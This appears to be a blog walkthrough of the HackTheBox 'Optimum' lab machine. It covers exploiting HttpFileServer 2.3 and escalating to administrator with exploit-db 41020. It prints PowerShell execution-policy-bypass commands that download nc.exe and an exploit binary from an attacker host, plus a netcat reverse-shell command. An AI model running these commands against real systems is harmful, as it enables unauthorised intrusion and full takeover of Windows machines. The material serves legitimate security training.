HackTheBox – Optimum Walkthrough

Okay ramping up the difficulty a little. Not another really tough box but this one was done with no metasploit so there was some added complexity.

Mapping the Attack Surface

Not a whole lot going on as far as running services. Just a single HTTP server

This service is interesting. Looks like it’s running HttpFileServer 2.3

When I run nikto we confirm this

Getting a Shell

So a quick google search later for HFS 2.3 exploit came back with this exploit-db gem

Don’t forget to crack it open and update the ip and port information

If you set it all up correctly (and the box doesn’t need to be reset like mine did) then you should get a shell

It appears that you land as user kostas who is a local non-admin user. So I grab their flag and I move on

Privilege Escalation to Administrator

Next I grab the systeminfo

Let’s take this systeminfo output and feed it into the windows-exploit-suggester.py

When using this tool, first make sure to update it in order to download the newest database xls. Then run it against your systeminfo file

So I started by running the first exploit in there at the top and it just seemed to jam up my shell. Then I noticed that most commands were jamming up my shell. So what I decided to do what put nc.exe on the machine and send myself a proper cmd.exe reverse shell. This worked waaaaaay better

The commands looks like this

cp /usr/share/windows-binaries/nc.exe /var/www/html

service apache2 start

powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadFile("http://10.10.14.20/nc.exe", "C:\Users\kostas\Desktop\nc.exe")

Then I start a netcat listener on 444 and then in my existing shell I run ./nc.exe 10.10.14.20 444 -e cmd.exe

Once I have my new shell I then tried the first exploit in the list again 41015 but still couldn’t get it to work. Then I moved on to the next one 41020 found here https://www.exploit-db.com/exploits/41020/

There’s a link to a precompiled binary in there if you don’t want to try and compile it yourself. This was the route I went with.

Using a simil

powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadFile("http://10.10.14.20/41020.exe", "C:\Users\kostas\Desktop\41020.exe")

That’s essentially it!

Once you run that executable you’ll be an Admin on the machine

Leave a Reply

3 × three =